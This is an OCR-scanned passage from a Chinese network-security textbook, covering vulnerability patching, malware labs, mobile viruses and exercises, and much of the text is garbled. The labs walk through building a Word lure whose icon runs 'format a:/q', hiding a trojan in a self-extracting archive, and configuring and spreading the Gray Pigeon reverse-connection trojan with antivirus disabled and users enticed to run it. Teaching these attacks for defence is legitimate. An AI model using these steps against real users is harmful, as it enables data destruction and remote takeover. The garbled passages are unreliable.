吉 用 P2p 方 式 传 办 的 网 络 电视 软件 。 We 6.99 投票 。。 控 册 法 于 四 
要 相关 租 件 人 
民 友 由 视频 文件 的 应 手 让 名。 i 62 分 投票 的 寺 加 Se 
ne 从 站 页 
区 在 检视 天 清册 位 ， 可 以 让 视频 过 下 载 ， 济 和 沪 问 更 加 用 由 ; 清理 后 会 导 ， 67 分 投票 的 理 si 
太古 具 楼 枕 讯 . 潭 宣 县 为 了 扩 屡 古人 h 怠 。 得 机 有 此 梳妆 点 击 后 全 玫 出 广 雌 或 椎 广 来 和 Se 按 需 清理 信任 
如 果 怀 疑 电脑 有 严重 问题 ， 清 用 360 系 纺 急 攻 箱 
程序 折 本 5.02001“ 兰 用 木马 诛 : 2012.03.23 。 巷 杰 更 新 
图 4-22 清理 插件 


步骤 2: 扫描 结束 后 ,360 安全 卫士 列 出 所 有 检测 到 的 系统 漏洞 ,如 图 4-23 所 示 ,选中 需 
要 修复 的 漏洞 , 单 击 “ 立 即 修复 ”按钮 进行 修复 。 


350 安 全 卫士 8.5 便 用 简洁 般 - [SI ~ 上 Dl x 
和 用 | 本 驴 ， 亲本 网 本 更 人 检测 。 3 保 禁 。 软 伞 管 宁 。 优化 加 
电 及 什 检 |” 亚 杀 林 马 | 。 清理 所 首 ”| 。 修复 湿 油 “| “一 各 法 理 ”| 。 清理 垃圾 “| 。 清理 并 还 “| 。 系统 修复 
和 并 大 成 .在 您 的 系统 中 共 检测 画 | 141 个 漏洞 ， 其 中 115 个 高 危 源 洞 需 立 即 修复 。 已 安装 (0) 已 智 曲 (0) 已 过 期 (599) 设置 
ul 补丁 名 称 。 描述 发 布 日 期 状态 


日 系统 及 office 高 危 源 油 (115) - 这 些 涛 测 可 能 会 六 不 马 、 珊 毒 利用 ， 研 坏 个 的 计算 机 ， 请 立即 修复 。 有 
回 严重 。 KB925398 。 Windows Media Format 中 可 能 允许 运程 代码 执行 .， 2006-12-11 未 修复 


Windows 系 统 安 全 更 新 程序 2007.02.13 未 候 复 
Windows 实 于 程 序 (SI 安全 更 新 2007.0522 未 修复 

回 严重 。 KB8929123 Outiook Express 和 Windows Ma 的 时 积 性 安全 .2007-06-11 未 修复 

回 重要 。 KB933854 。 Windows Server 2003 更 新 程序 200707-10 来信 复 ee 

回 重要 。 KB944653 。 Macrovision 纪 示 可 序 中 的 沽 油 可 能 多 许 本 地 特权 ..，。 2007-12-11 未 修复 2360 全 卫士 二 和 八仙 久 

重要 。 KB942831 。 Intemet Information SeryicestllS) 伟 息 服务 中 的 .， 2008.02-11 未 修复 打 补 本 、 省 带宽 ， 统一 管理 企业 安全 

回 重要 。 KB946026 。 mpxday sys3E 动 程序 可 能 允 洗 运程 近 抽 2008.02.11 未 修 复 

重要 。 KB950762 。 实际 通用 多 播 (PGM) 中 的 漏洞 可 能 刀 许 拒 弛 服务 。。2009.06-10 未 修复 
回 重要 。 KB951748 。 DNS 中 的 派 油 可 允许 隐 给 2008.07.07 未 修 复 


全 选 全 不 迁 导出 泼 洞 信息 
E3502001 者 用 森马 库 : 2012.0323 检查 更 新 


4-23 ”修复 漏洞 
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4.4.3 ”任务 3: 宏 病毒 和 网 页 病毒 的 防范 


1. 任务 目标 


(1) 掌握 宏 病毒 的 防范 方法 。 
(2) 掌握 网 页 病毒 的 防范 方法 。 


2. 任务 内 容 


(1) 宏 病 毒 的 防范 。 
(2) 网 页 病毒 的 防范 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 1 台 。 
(2) Office 办 公 软 件 1 套 。 


4. 任务 实施 步骤 


(1) 宏 病毒 的 防范 

@ 制作 一 个 简单 的 宏 病 毒 

步骤 1: 在 Word 文档 中 , 选择“ 插 入” 一“ 对象” 命令 , 打开“ 对象” 对 话 框 , 如 
图 4-24 所 示 。 

步骤 2: 在 “新 建 ” 选 项 卡 中 ,选择 “ 包 ” 选 项 后 , 单 击 “ 确 定 ” 按 钮 ,打开 “对 象 包装 程序 ” 窗 
口 ,如 图 4-25 所 示 ,选择 该 窗口 中 的 “编辑 ”一 “命令 行 "命令 ,在 打开 的 “命令 行 ” 对 话 框 中 输 
人 C:\windows\system32\format a:/q; 单 击 “ 确 定 ” 按 钮 。 


口 显示 为 图 标 他 ) 


在 您 的 文档 中 插入 一 个 新 “ 包 ” 对象。 
EE 


Ca Ci 


图 4-24 “对 象 "对 话 框 图 4-25 “对 象 包装 程序 窗口 


步骤 3: 然后 在 "对象 包 装 程序 "窗口 中 单 击 “ 插 入 图 标 ” 按 钮 .打开 “更 改 图 标 ” 对 话 框 ， 
如 图 4-26 所 示 ,为 该 命令 行 选择 一 个 有 诱惑 力 的 图 标 , 然 后 关闭 “对 象 包装 程序 ”窗口 。 
步骤 4: 此 时 会 在 文档 的 相关 位 置 出 现 一 个 和 相关 命令 关联 的 图 标 ,还 可 以 在 图 标 旁 边 
加 注 一 些 鼓 动 性 的 文字 ,如 图 4-27 所 示 , 尽 量 使 浏览 者 看 到 后 想 用 鼠标 单 击 , 这 样 一 个 简单 
的 宏 病 毒 就 制作 成 功 了 。 
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余人 宇 @ d= 


SO@=—S 


图 4-26 “更 改 图 标 ” 对 话 框 图 4-27 一 个 简单 的 宏 病 毒 


说 明 : 如 果 把 这 里 的 “format a:/q” 改 为 “format c:/q”, 那 么 大 家 就 知道 后 果 会 有 多 么 
严重 了 。 也 可 以 自己 录制 一 个 宏 , 在 Word 文档 中 选择 “工具 ”一 “ 宏 "” 一 “录制 新 宏 " 命 令 。 
另外 ,也 可 以 用 Visual Basic 编辑 宏 ,在 Word 文档 中 选择 “工具 ”一 “ 宏 ">“Visual Basic 编 
辑 器 ”命令 。 如 果 在 Visual Basic 中 编辑 如 图 4-28 所 示 的 代码 ,只 是 个 恶作剧 ,如 果 把 循环 
改 为 死 循 环 , Word 就 无 法 正常 使 用 了 。 

@) 宏 病 毒 的 防范 

步骤 1: 使 用 杀毒 软件 查 杀 Office 软件 的 安装 目录 和 相关 Office 文档 。 

步骤 2: 在 Word 2003 软件 中 .选择 “工具 ”一 “ 宏 ” 一 “安全 性 ”命令 ,打开 “安全 性 ”对 话 
框 ,在 “安全 级 ”选项 卡 中 ,选中 “高 ” 单 选 按钮 ,如 图 4-29 所 示 , 表 示 只 允许 运行 可 靠 来 源 签 
署 的 宏 ,未 经 签署 的 宏 会 自动 取消 。 


Er nn] 


0 


六 世 主 运 行 可 招来 源 符 轩 的 室 ， 示 你 答 署 的 宅 全 自动 取 济 
口中 。 修 可 以 寺 关 是 和 运行 可 能 不 安全 的 室 0) 


oe 


图 4-28 在 Word 文档 中 使 用 Visual Basic 编辑 宏 图 4-29 “安全 性 ?对 话 框 


(2) 网 页 病毒 的 防范 
Q@ 制作 一 个 简单 的 网 页 病毒 
步骤 1: 编写 ASP 脚本 文件 index. asp, 内 容 如 下 : 


Dim fso 
Set fso = Server. CreateObject("Scripting. FilesystemObject") 
fso. CreateTextFile("C:\newfile") 
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Response, write(" 在 C 盘 新 建 了 newfile 文 件 ") 
Set fso = nothing 
> 
=/body> 
=/htnl> 
其 中 ,二 % 与 % 二 之 间 的 内 容 为 VBScript 脚本 代码 ,Dim 定义 了 一 个 fso 对 象 变量 ， 
“Set fs0= Server. CreateObject("Scripting. FilesystemObject")” 产 生 了 一 个 服务 器 文件 系 
统 对 象 ,“fso. CreateTextFile("C:\newfile")” 在 C 盘 根 日 录 新建 一 个 文件 newfile, 并 且 使 
用 “Response. write(" 在 C 盘 新 建 了 newfile 文件 ")" 在 页 面 中 说 明 新 文件 已 经 建立 。 
步骤 2: 配置 好 Web 服务 器 (IIS) ,并 把 index. asp 文件 保存 到 Web 服务 器 的 路 径 中 ， 
如 C:\Inetpub\wwwroot\index. asp。 
步骤 3: 打开 正 浏览 器 ,在 地 址 栏 中 输入 http://localhost/index. asp, 则 将 在 网 页 中 可 
看 到 “在 C 盘 新 建 了 newfile 文件 ”信息 ,如 图 4-30 所 示 , 并 且 已 在 C 盘 根 目录 新 建 了 一 个 


newfile 文件 ,如 图 4-31 所 示 。 


pz//localhost/index。 asp 


屿 强 下 查看 WD 收藏 和 ) 工具 GD 帮助 ”” 


On- © BW Pe 


地 址 | 狠 Mtp /NocuhosVinder sp 国 园 列 到 生理 > 


闪现 天 文人 青天 


文件 和 文人 责任 务 【2 
鸭 本 esiT 文 作 


图 4-30 一 个 简单 的 网 页 病毒 图 4-31 在 C 盘 根 目录 新 建 一 个 myfile 文 件 


在 C 盘 新 建 了 myfile 文 件 


@ 网 页 病毒 的 防范 

步骤 1: 运行 regsvr32 scrrun. dll /u 命令 ,禁止 使 用 文件 系统 对 象 FilesystemObject。 

步骤 2: 在 I 浏览 器 中 ,选择 “工具 "一 “Internet 选项 ”命令 ,打开 “Internet 选项 ”对 话 
框 ,在 “安全 ”选项 卡 中 , 单 击 “ 自 定义 级 别 ” 按 钮 .打开 “安全 设置 ”对话 框 ,把 “ActiveX 控件 
和 插件 ” 栏 日 中 的 所 有 项 日 设置 为 “禁用 ”, 如 图 4-32 所 示 。 


SC E 记 办 可 安全 执行 有 本 的 AetiveX 控件 执行 肚 2 
ee 
© 


图 4-32 “安全 设置 ”对话 框 
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4.4.4 任务 4: 利 用 自 解压 文件 携带 木马 程序 


1. 任务 目标 


(1) 了 解 利用 自 解压 文件 携带 木马 程序 的 方法 。 
(2) 了 解 木马 程序 的 隐藏 方法 。 


2. 任务 内 容 


利用 自 解压 文件 携带 木马 程序 。 
3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 1 台 。 


(2) WinRAR 压缩 软件 1 套 。 


4. 任务 实施 步骤 


准备 一 个 Word 文件 (如 “myfile. doc”) 和 一 个 木马 程序 (如 “木马 . exe”)。 在 本 任务 中 ， 
为 了 安全 起 见 , 把 计算 器 程序 “calc. exe” 改 名 为 “木马 . exe”, 即 用 计算 器 程序 代替 木马 程序 。 


步骤 1: 下载 并 安装 WinRAR 软件 。 


步骤 2: 右 击 myfile. doc 文件 ,在 弹出 的 快捷 菜单 中 选择 “添加 到 压缩 文件 "命令 ,打开 
“压缩 文件 名 和 参数 "对话 框 ,在 “常规 "选项 卡 中 ,选中 “创建 自 解压 格式 压缩 文件 " 复 选 框 ， 
并 把 压缩 文件 名 改 为 “利用 自 解压 文件 携带 木马 程序 .exe”, 如 图 4-33 所 示 。 

步骤 3: 在 "文件 ?选项 卡 中 , 单 击 * 要 添加 的 文件 "文本 框 右 侧 的 “追加 ”按钮 ,此 时 可 以 
选择 一 个 预先 准备 好 的 “木马 .exe” 文 件 , 如 图 4-34 所 示 。 


渤 压 第 文件 名 和 大 数 


取 置 ) 
压 吃 文件 格式 
OM 
Omw 


压缩 方式 C) 
[ 准 ~ 
压 纺 分 卷 大 小, 字 节 D 


汪 压 第 文件 名 和 争 数 


I 
不 压 瑞 直接 存储 的 文件 QD) 


文件 路 径 趾 

| 奉 姥 相对 路 径 
压缩 文件 
口 把 每 个 文件 放 到 单独 的 压缩 广 件 中 G) 
口 压强 文件 用 zesil 发 送 到 人) 


图 4-33 “常规 ”选项 卡 


确定 


图 4-34 “文件 ”选项 卡 


步骤 4: 在 如 图 4-35 所 示 的 “高 级 "选项 卡 中 . 单 击 自 解压 选项 ”按钮 ,打开 “高 级 自 解 


压 选 项 ”对 话 框 ,如 图 4-36 所 示 。 
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尘 压 第 文件 名 和 考 数 


保存 当前 设置 为 默认 值 多 ) 


和 到 是 取消 


图 4-35 “高 级 ”选项 卡 图 4-36 “高 级 自 解压 选项 ”对 话 框 

步骤 5: 在 “常规 ”选项 卡 中 ,选中 “在 当前 文件 夹 中 创建 " 单 选 按钮 ,并 在 “解压 后 运行 ” 
文本 框 中 输入 “木马 . exe”。 

步骤 6: 单 击 “ 确 定 ” 按 钮 ,返回 到 “压缩 文件 名 和 参数 ”对 话 框 ,再 单 击 “ 确 定 ” 按 钮 ,最 终 
将 产生 一 个 自 解压 文件 “利用 自 解压 文件 携带 木马 程序 . exe”。 

步骤 7: 把 产生 的 自 解压 文件 “利用 自 解压 文件 携带 木马 程序 . exe” 复 制 到 其 他 文件 夹 
中 ,并 双击 运行 ,观察 运行 结果 。 

这 种 携带 木马 程序 的 自 解压 文件 ,一 般 可 以 用 杀毒 软件 进行 查 杀 。 


4.4.5 任务 5: 反 弹 端 口 木 马 ( 灰 饮 子 ) 的 演示 


1. 任务 目标 


(1) 了 人 解 反 弹 端 口 木 马 ( 灰 蚀 子 ) 的 工作 原理 和 配置 方法 。 
(2) 了 解 灰 蚀 子 木马 的 危害 。 


2. 任务 内 容 


(1) 配置 服务 端 程序 。 
(2) 传播 木马 。 
(3) 控制 端 操作 。 


3. 完成 任务 所 需 的 设备 和 软件 
(1) 装 有 Windows XP/2003 操作 系统 的 PC 2 台 。 
(2) 灰 鲍 子 木 马 程序 1 套 。 
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4. 任务 实施 步骤 


在 局 域 网 中 ,在 A 主机 (192. 168. 1.11) 上 安装 灰 铝 子 控制 端 ,在 BB 主机 (192. 168. 1.12) 上 
安装 灰 饮 子 服务 端 .A 主机 控制 B 主机 。 

(1) 配置 服务 端 程序 

步骤 1: 在 A 主机 上 先 关 闭 杀 毒 软件 ,然后 运行 灰 蚀 子 客户 端 程序 H_Client. exe, 打 开 
“ 灰 蚀 子 ” 主 窗口 . 单 击 “ 配 置 服务 程序 ”按钮 ,打开 “服务 器 配置 "窗口 ,在 “连接 类 型 "选项 卡 
中 ,选中 “自动 上 线 型 :无 须知 道 远 程 IP, 可 自动 上 线 控制 " 单 选 按 钮 ,并 在 “DNS 解析 域名 ” 
文本 框 中 输入 “192. 168. 1. 11”( 控 制 端 A 主机 的 IP 地 址 ) ,在 “上 线 端口 "文本 框 中 输入 80， 
在 “保存 路 径 ” 文 本 框 中 输入 *C:\ 服 务 端 程序 . exe”, 如 图 4-37 所 示 。 


| 文件 EE) 设置 @) 查看 帮助 00 


Fo ov | 
I rer Ee 


图 4-37 “连接 类 型 "选项 卡 


其 中 ,80 端口 是 控制 端 打 开 的 监听 端口 ,伪装 为 WWW 监听 端口 。 
步骤 2: 按 图 4-38 一 图 4-40 所 示 进 一 步 进行 设置 ,继续 进行 伪装 。 


图 4-38 “安装 信息 ”选项 卡 图 4-39 “注册 表 ” 选 项 卡 
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步骤 3: 最 后 单 击 “ 生 成 服务 器 "按钮 ,最 终 在 C 盘 根 目 录 下 生成 “服务 端 程序 . exe" 文 件 。 

步骤 4: 在 “ 灰 钥 子 " 主 窗口 中 ,选择 “设置 ”一 系统 设置 "命令 ,打开 “系统 设置 "窗口 ,在 
“端口 设置 ?选项 卡 中 ,设置 “自动 上 线 端 口 ? 为 80, 如 图 4-41 所 示 , 单 击 “ 保 存 设置 "按钮 ,并 
关闭 “系统 设置 "窗口 。 


图 4-40 “图 标 信息 ”选项 卡 图 4-41 “系统 设置 "窗口 


(2) 传播 木马 

通过 各 种 方式 传播 该 木马 服务 端 程序 ,并 诱惑 用 户 运行 该 程序 。 在 本 任务 中 可 直接 把 
“服务 端 程序 . exe" 文 件 复 制 到 服务 端 B 主机 (192. 168. 1. 12) 上 。 

(3) 控制 端 操作 

步骤 1: 在 服务 端 B 主机 上 先 关闭 杀毒 软件 ,然后 运行 “服务 端 程序 . exe” 程 序 后 ,在 控 
制 端 A 主机 的 * 灰 鸽子" 主 窗 口中 ,可 看 到 服务 端 B 主机 (192. 168. 1. 12) 已 自动 上 线 , 如 
图 4-42 所 示 , 此 时 可 进行 以 下 操作 :获取 系统 信息 .限制 系统 功能 .屏幕 捕获 ,文件 管理 、. 远 
程控 制 .注册 表 管 理 .文件 传输 .远程 通信 等 操作 。 


文件 中 LT 查看 Q 帮助 人 0 


27.0.0.1 可 was[sao] 
搜索 内 容 : | 目 sb 上册 主 机 ee 搜索 结果 : [ 旦 示 搜 索 结 时 。 =] [搜索 
加 -是 我 的 电脑 a 
四 畏 主动 演 接 主 机 | 
9 | Poements wma Settines 2012-03-28 19:35 
本 | rr riles 2012-03-26 19:40 
| yat Vee testie 2012-09-28 19:40 
DY | 已 mmos 2012-03-26 19:40 
1 回 wmogxec air o 2012-03-26 19:32 | 
| eet ii all 2012-03-26 19:29 
| 国 weottont win 322730 2008-04-14 20:00 
| 加 o 2012-03-26 19:32 
i 国 I0.515 o 2012-03-26 19:32 
spos.sYs o 2012-03-26 19:32 
Eoerscr. co 4T7564 2008-04-14 20:00 
a 257128 2008-04-14 20:00 
pagefile sys 805305358 2012-03-26 19:49 
区 让 忆 和 主机 法 行 运 各 控制 了 ”07:51:01 下 午 加 
EE 
| 
[ET E 8 


图 4-42 服务 端 (192. 168.1.12) 已 自动 上 线 
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步骤 2: 在 控制 端 A 主机 上 运行 netstat -a 命令 ,查看 控制 端的 端口 情况 .如 图 4-43 所 
示 , 可 见 控制 端 打 开 的 是 HTTP 端口 (80 端口 )。 


C+ \WINDOYS\systenI?\cad ene 


图 4-43” 灰 鲍 子 控制 端的 端口 情况 


步骤 3: 在 服务 端 B 主 机 上 运行 netstat -a 命令 ,查看 服务 端的 端口 情况 ,如 图 4-44 所 
示 , 可 见 服务 端 连 接 的 是 控 #192. 168. 1. 11 主机 的 HTTP 端口 (80 端口 ) ,与 访问 某 台 
Web 服务 器 是 一 样 的 ,服务 端的 防火 墙 一 般 会 允许 这 样 的 连接 。 


图 4-44 灰 铝 子 服务 端的 端口 情况 


45 拓展 提高 :手机 病毒 


根据 2011 年 金山 网 络 安全 中 心 监测 ,手机 病毒 从 每 日 新 增 6 一 10 个 疾 升 至 每 日 新 增 
80 一 200 个 ,估计 国内 30% 的 安 卓 用 户 在 不 知 不 觉 中 被 恶意 扣 费 500 元 以 上 。 传 统 的 计算 
机 病毒 作者 都 开始 向 安 卓 平台 转移 ,同时 还 将 各 种 广泛 应 用 在 计算 机 上 的 病毒 技术 移植 到 
安 卓 平台 ,针对 安 卓 平台 的 智能 手机 病毒 增长 迅猛 ,受害 人 数 不 断 扩大 的 趋势 。 

手机 病毒 是 一 种 具有 传染 性 、 破 坏 性 、 隐 项 性 的 手机 程序 。 其 可 利用 发 送 短信 彩信, 电 
子 邮 件 .浏览 网 站 、 下 载 铃声 .蓝牙 等 方式 进行 传播 :会 导致 用 户 手机 死机 、 关 机 、 个 人 资料 被 
删 、 向 外 发 送 垃圾 邮件 泄露 个 人 信息 、 利 用 自动 拨打 电话 或 发 短 ( 彩 ) 信 等 进行 亚 
至 会 损毁 SIM 卡 .芯片 等 硬件 ,导致 使 用 者 无 法 正常 使 用 手机 。 目 前 手机 病毒 可 以 分 为 破 
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坏 数 据 类 、 恶 意 扣 费 类 ,泄露 信息 类 三 种 。 

(1) 手机 病毒 的 传播 途径 

手机 病毒 的 传播 方式 有 着 自身 的 特点 ,同时 也 和 计算 机 病毒 传染 有 相似 的 地 方 。 手 机 
病毒 传播 途径 主要 有 : 

@ 通过 手机 蓝牙 无线 数据 传输 传播 。 

@@ 通过 手机 SIM 卡 或 者 WiFi 网 络 , 在 网 络 上 进行 传播 。 

@ 在 把 手机 和 计算 机 连接 的 时 候 ,被 计算 机 上 的 病毒 感染 ,并 进行 传播 。 

@ 单 击 短信 彩信 中 的 未 知 链接 后 ,进行 病毒 的 传播 。 

(2) 手机 病毒 的 危害 

手机 病毒 的 危害 主要 有 : 

@ 导致 用 户 信息 被 窃 。 如 今 , 越 来 越 多 的 手机 用 户 将 个 人 信息 存储 在 手机 上 了 ,如 个 
人 通信 录 、 个 人 信息 日程 安排 .各 种 网 络 账号 .银行 账号 和 密码 等 。 这 些 重要 的 资料 ,必然 
引 来 一 些 别有用心 者 的 “ 垂 泛 ”, 他 们 会 编写 各 种 病毒 人 侵 手 机 ,窃取 用 户 的 重要 信息 。 

@ 传播 非法 信息 。 现 在 ,彩信 大 行 其 道 , 为 各 种 色情 、 非 法 的 图 片 .语音 .电影 传播 提供 
了 便利 。 

@ 破坏 手机 软 \ 硬 件 。 手 机 病毒 最 常见 的 危害 就 是 破坏 手机 软 \ 硬 件 , 导 致 手机 无 法 正常 
工作 。 

@ 造成 通信 网 络 瘫痪 。 如 果 病 毒 感染 手机 后 ,强制 手机 不 断 地 向 所 在 通信 网 络 发 送 垃圾 
信息 ,这 样 势必 导致 通信 网 络 信 息 堵塞 。 这些 垃圾 信息 最 终 会 让 局 部 的 手机 通信 网络 瘫痪 。 

(3) 常见 手机 病毒 

2009 年 11 月 10 日 ，Android 平 台 出 现 第 一 个 恶意 间谍 软件 Mobile Spy. 该 程序 会 自动 记 
录用 户 所 输入 的 任何 信息 并 发 送 到 黑客 的 邮箱 中 .还 可 以 视频 录 下 用 户 的 所 有 操作 过 程 。 

2010 年 8 月 12 日 ,Android 平台 出 现 第 一 个 木马 病毒 : Trojan-SMS. AndroidOS. 
FakePlayer. a, 该 木马 病毒 会 伪装 成 应 用 程序 , 当 用 户 不 小 心安 装 之 后 , 它 便 会 疯狂 地 发 送 
短信 ,使 用 户 的 手机 开通 高 额 的 收费 服务 。 

2011 年 12 月 ,名 为 “Carrier IQ” 的 软件 能 够 实时 监控 用 户 使 用 手机 情况 及 记录 用 户 所 
处 位 置信 息 , 更 可 怕 的 是 该 软件 不 通过 用 户 明确 批准 ,就 会 自动 启用 并 收集 手机 上 的 数据 
(如 按键 信息 ,短信 内 容 、 图 片 .视频 等 )。 无 须 root 或 删除 特定 安全 防护 软件 就 能 获得 手机 
的 管理 员 权限 ,几乎 让 人 无 法 察觉 它 的 存在 。 

(4) 手机 病毒 的 预防 

Q@ 删除 乱码 短信 、 彩 信 。 乱 码 短信 、 彩 信 可 能 带 有 病毒 , 收 到 此 类 短信 后 立即 删除 ,以 
免 感染 手机 病毒 。 

@ 不 要 接受 陌生 请 求 。 利 用 无 线 传送 功能 比如 蓝牙 .红外 接收 信息 时 ,一 定 要 选择 安 
全 可 靠 的 传送 对 象 . 如 果 有 陌生 设备 请 求 连 接 最 好 不 要 接收 。 因 为 手机 病毒 会 自动 搜索 无 
线 信号 覆盖 范围 内 的 设备 进行 病毒 的 传播 。 

@ 保证 下 载 的 安全 性 。 现 在 网 上 有 许多 资源 提供 手机 下 载 , 然 而 很 多 病毒 就 隐藏 在 这 
些 资源 中 ,这 就 要 求 用 户 在 使 用 手机 下 载 各 种 资源 的 时 候 确 保 下 载 站 点 是 否 安 全 可 靠 , 尽 量 
避免 去 个 人 网 站 下 载 。 

@ 选择 手机 自 带 背景 。 漂 亮 的 背景 图 片 与 屏保 固然 令 人 赏心悦目 ,但 图 片 中 如 果 带 有 
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病毒 就 危险 了 ,所 以 用 户 最 好 使 用 手机 自 带 的 图 片 进 行 背景 设置 。 

回 不 要 浏览 危险 网 站 。 比 如 一 些 黑客 .色情 网 站 ,本 身 就 是 很 危险 的 ,其 中 隐匿 着 许多 
病毒 与 木马 ,用 手机 浏览 此 类 网 站 是 非常 危险 的 。 

@ 安装 手机 防 病毒 软件 。 现 在 国内 外 各 大 杀毒 软件 开发 商都 发 布 了 自己 的 手机 版 杀 
毒 软件 ,可 以 下 载 安装 ,为 手机 提供 病毒 防护 的 一 道 屏障 。 

使 用 “古董 机 ”的 用 户 可 以 100% 的 放心 。 毕 竟 不 是 100% 的 人 都 用 智能 手机 ,而 使 用 “ 古 
董 机 ”, 即 那 种 黑白 屏幕 ,无 法 连 上 WAP 网 的 手机 ,可 以 放心 使 用 ,病毒 无 法 感染 这 种 手机 。 


46 习 题 
一 、 选 择 题 
1. 计算 机 病毒 是 一 种 ”中 :其 特性 不 包括 @ . 
@ A. 软件 故障 B. 硬件 故障 C. 程序 D. 细菌 
Q@ A. 传染 性 B. 隐蔽 性 C. 破坏 性 D. 自生 性 


2. 下 列 叙 述 中 正确 的 是 
A. 计算 机 病毒 只 感染 可 执行 文件 


B. 计算 机 病毒 只 感染 文本 文件 
C. 计算 机 病毒 只 能 通过 软件 复制 的 方式 进行 传播 
D. 计算 机 病毒 可 以 通过 读 / 写 磁盘 或 网 络 等 方式 进行 传播 
病毒 是 定期 发 作 的 ,可 以 设置 Flash ROM 防 写 状态 来 避免 病毒 破 
坏 ROM 。 
A. Melissa B. CIH C. 木马 D. 蠕虫 
4. 效率 最 高 .最 保险 的 杀毒 方式 是 
A. 手动 杀毒 B. 自动 杀毒 C. 杀毒 软件 D. 磁盘 格式 化 
5. 网 络 病毒 与 一 般 病 毒 相 比 ， 
A. 隐蔽 性 强 B. 潜伏 性 强 C. 破坏 性 大 D. 传播 性 广 
6. 计算 机 病毒 最 主要 的 两 个 特征 是 
A. 隐蔽 性 和 破坏 性 B. 潜伏 性 和 破坏 性 
C. 传染 性 和 破坏 性 D. 隐蔽 性 和 污染 性 
7. 计算 机 病毒 的 破坏 方式 包括 。( 多 选 题 ) 
A. 删除 修改 文件 B. 抢占 系统 资源 
C. 非法 访问 系统 进程 D. 破坏 操作 系统 


8. 用 每 一 种 病毒 体 含有 的 特征 代码 对 被 检测 的 对 象 进 行 扫描 ,如 果 发 现 特征 代码 ,就 
表明 了 检测 到 该 特征 代码 所 代表 的 病毒 .这 种 病毒 的 检测 方法 称 为 


A. 比较 法 B. 特征 代码 法 C. 行为 监测 法 
D. 软件 模拟 法 E. 校 验 和 法 

9. 计算 机 感染 病毒 后 ,症状 可 能 有 。 
A. 计算 机 运行 速度 变 慢 B. 文件 长 度 变 长 


C. 不 能 执行 某 些 文件 D. 以 上 都 对 
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. 宏 病 毒 可 以 感染 k 

A. 可 执行 文件 B. 引导 扇 区 /分 区 表 

C. Word/Excel 文档 D. 数据 库 文件 
. 计算 机 病毒 的 传播 方式 有 。( 多 选 题 ) 

A. 通过 共享 资源 传播 B. 通过 网 页 恶意 脚本 传播 

C. 通过 网 络 文件 传输 传播 D. 通过 电子 邮件 传播 

以 下 不 是 杀毒 软件 。 

A. 瑞星 B. Word 

C. Norton Antivirus D. 金山 毒霸 

、 判断 题 


将 文件 的 属性 设 为 只 读 不 可 以 保护 其 不 被 病毒 感染 。 
重新 格式 化 硬盘 可 以 清除 所 有 病毒 。 
GIF 和 JPG 格式 的 文件 不 会 感染 病毒 。 


. 在 Outlook Express 中 仅 预 览 邮件 的 内 容 而 不 打开 邮件 的 附件 是 不 会 中 毒 的 。 
. 木马 与 传统 病毒 不 同 的 是 :木马 不 会 自我 复制 。 
. 文本 文件 不 会 感染 宏 病毒 。 


文件 型 病毒 只 感染 扩展 名 为 . com 和 . exe 的 文件 。 
. 世界 上 第 一 个 攻击 硬件 的 病毒 是 CIH 。 
.只 要 安装 了 杀毒 软件 ,计算 机 就 安全 了 。 


网 络 时 代 的 计算 机 病毒 虽然 传播 快 , 但 容易 控制 。 
计算 机 病毒 只 能 感染 可 执行 文件 。 
、 简 答题 


. 什么 是 计算 机 病毒 ? 计算 机 病毒 有 哪些 特征 ? 

. 什么 是 宏 病毒 ? 

. 什么 是 蠕虫 病毒 ? 蠕虫 病毒 与 一 般 病 毒 有 何 区 别 ? 

. 计算 机 病毒 检测 方法 有 哪些 ? 简 述 其 原理 。 

. 目前 计算 机 病毒 的 传播 途径 是 什么 ? 

. 什么 是 木马 ? 木马 的 基本 特征 有 哪些 ? 木马 可 分 为 哪 几 类 ? 
. 如 何 预防 计算 机 病毒 ? 


、 操 作 练 习题 


. 从 网 上 下 载 灰 鸽子 木马 专 杀 工 具 , 查 杀 灰 鸽子 木马 。 
. 对 机 房 中 的 计算 机 进行 漏洞 检测 和 修复 。 


若 一 台 计 算 机 感染 了 病毒 ,只 要 删除 所 有 带 毒 文件 ,就 能 消除 所 有 病毒 。 


《 


( 
( 
( 


. 蠕虫 病毒 是 指 一 个 程序 (或 一 组 程序 ) ,通过 网 络 传播 到 其 他 计算 机 系统 中 去 。 


对 于 一 个 有 写 保护 功能 的 优盘 ,其 写 保 护 开关 是 防止 病毒 人 侵 的 重要 防护 措施 。 
‘ 


( 
长 
攻 


只 是 从 被 感染 磁盘 上 复制 文件 到 硬盘 上 ,并 不 运行 其 中 的 可 执行 文件 不 会 使 系统 感 


) 
) 
) 
) 
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51 项 目 提 出 


某 高 校 期 末 考 试 前 期 ,老师 们 忙 着 准备 期 末 考 试 试题 。 根 据 学 校 要 求 ,相同 或 相近 专业 
的 不 同班 级 同一 门 课程 要 采用 同一 试卷 ,恰巧 张 老师 和 李 老 师 任 教 同一 门 课程 一 一 C 语言 
程序 设计 。 于 是 两 位 老师 商量 . 先 由 张 老师 准备 好 试题 ,再 由 李 老 师 提出 修改 意见 。 张 老师 
出 好 A、B 卷 试 题 及 参考 答案 后 ,通过 电子 邮件 的 方式 传 给 李 老 师 , 以 便 李 老师 提出 修改 意 
见 , 邮 件 主 题 为 期末 考 试 试题 (C 语言 程序 设计 )”。 

谁 料 ,在 期 末 考 试 当天 ,在 考场 上 竟 出 现 了 与 考试 试题 几乎 一 模 一 样 的 资料 ,监考 老 
师 马上 意识 到 事态 的 严重 性 .考题 已 泄露 ! 这 是 一 起 严重 的 教学 事故 。 可 是 ,考题 的 内 容 
应 该 只 有 张 老师 和 李 老 师 知道 , 张 老师 和 李 老 师 也 从 来 没有 把 考题 的 内 容 告 诉 过 第 三 个 人 ， 
那么 考题 的 内 容 究 竞 是 怎么 泄露 的 呢 ? 是 哪个 环节 出 现 了 问题 ? 谁 应 该 对 这 起 教学 
事故 负责 ? 


52 项 目 分 析 


学 校 成 立 了 教学 事故 调查 组 ,经 调查 发 现 , 张 老师 发 给 李 老 师 的 电子 邮件 没有 经 过 加 密 
处 理 , 是 以 明文 的 方式 传送 出 去 的 ,在 传送 过 程 中 ,被 第 三 方 截获 ,对 方 再 利用 网 络 嗅 探 软 件 
(如 Sniffer) ,就 可 以 看 到 邮件 的 具体 内 容 .所 以 考题 泄露 了 。 

